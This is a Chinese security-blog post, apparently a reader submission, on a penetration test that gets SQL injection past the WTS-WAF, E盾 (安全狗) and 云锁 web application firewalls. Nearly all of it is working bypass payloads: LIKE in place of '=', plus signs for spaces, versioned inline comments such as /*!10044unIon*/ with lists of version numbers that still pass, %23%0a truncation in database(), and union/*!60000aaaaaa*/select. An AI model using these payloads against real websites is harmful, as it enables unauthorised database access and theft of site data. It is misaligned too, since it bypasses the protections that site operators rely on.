渗透测试|实战记一次过狗(WTS、E盾安全狗、云锁)

2022010116153548WTS-WAF

网站页面

2022010116164271
 

WAF图标

2022010116171679
绕过1=1

1. 用like代替等号成功绕过

2022010116171670
​神奇的是 and 1空格=空格1居然也可以绕。这个waf的开发真有意思。

2022010116171738
 order by 不拦截。10个字段

union select绕过

1. 被拦截

2022010116171834

​尝试加号代替空格,被拦截

2022010116171530
​在select后面再加个加号,成功绕过union select

2022010116171453
 database不拦截

1. 单独select不拦截,直接通关。

 

2022010116171430
总结一下

1. union+select+1,2 绕waf过程可以养成加号代替空格的习惯,可能有意想不到的效果。

E盾(安全狗)

E盾图标

2022010116171324
等号绕过

1. and 加数字被过滤

2. like绕过。

3. 1 like 1不可以

2022010116171324
-1 like -1 可以。同理-1 like 1 屏蔽原内容。

1. 注意1 like -1也被屏蔽了。下图为正常显示画面,厚码。

2022010116171291
order by 不拦截。

6个字段。

1. ?id=123 and -1 like -1 /*!unIon*/ select 1,2,3,4,5,6– +

union select拦截

1. 单独union或者select不拦截

2. union select拦截

3. /\*\*/内的容纳不执行,/\*!\*/内联注释,里面内容执行

4. /\*!unIon\*/ /\*!select\*/ 拦截

5. /\*!unIon\*/ se/*!lect*/不拦截但是不显示内容

6. /\*!10044unIon select*/ 拦截

7. /\*!10044unIon\*/ /\*!10044select\*/不拦截,显示内容(版本号绕过,本来是/\*50001!\*/表示数据库版本>=5.00.01时就会执行。现在只有10044还可以用。)

8. unIon%23QQQQ%0Aselect。%23是注释符#的url编码。%0A是另起一行继续上一条指令。直接上#会被E盾拦截。这里可能因为版本问题,被拦截。

database()绕过

1. database被拦截

2. database%23%0a() 截断换行可以

20220101161711832022010116171038
/!10044database()/不可
database/*!10044*/() 不可
database/*!10044()*/可以

2022010116171084
from绕过

1. 测试了一下where不拦截

2. where /.*/ = 就拦截。用like代替等号不拦截

3. from不拦截。select /.*/ from拦截

4. fro%23%0am,没报错。但是不能用。完整的sql语句写出来,没有被拦截,但是不显示,也就是说语句出错。%23%0a不管在from的哪个位置都报错。同理我返回尝试database()在字母中插入截断%23%0a都无法正常显示,只有在单词跟括号中间可用。

5. /*!11440select*/可以绕过,且正常输出

2022010116170931
 总结一下

1. ·等号绕过用like

2.

3. ·过安全狗最好用的方式:内联注入!这里五位数字有些已经被狗拦截了。可以试试10440 –10449 13440-13449 14400-14499 15440-15449 16440-16449 17440-17449 18440-18449这些

4.

5. ·截断法%23%0a不能用在字母中间

云锁

云锁图标

 

2022010116170719
order by绕过,21个字段

内联注入永远的神

2022010116170879

union select拦截

1. 单独union,单独select不拦截

2.

3. union select联合拦截,内联没用。

2022010116170719

1. 中间放两个注释/\*\*//\*\*/也没用

2.

3. union/\*!60000aaaaaa\*/select可以绕过。但是这个叫什么绕过方法不知道。需要注意的,/\*!60000aaaaaa\*/是绕过union select和order by的神器左边数字需要大于50000,后面字母乱填。

database拦截

1. 绕过方法很简单,截断法。%23%0a在括号前截断。

 

2022010116170676
from被拦截

1. 这里首先尝试内联注入from,发现被拦截。

2022010116170673
把select也内联注入,不拦截

2022010116170567
 

总结一下

1. 绕过union select和order by神器 /\*60000aaaaaaa\*/。E盾也可以用。

2. 绕过database,截断

2022010104123067

本文来自投稿,不代表安强科技社区立场,如若转载,请注明出处:https://community.anqiangkj.com/archives/2073

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年1月1日 下午12:25
下一篇 2022年1月2日 上午12:48

相关推荐

发表回复

您的电子邮箱地址不会被公开。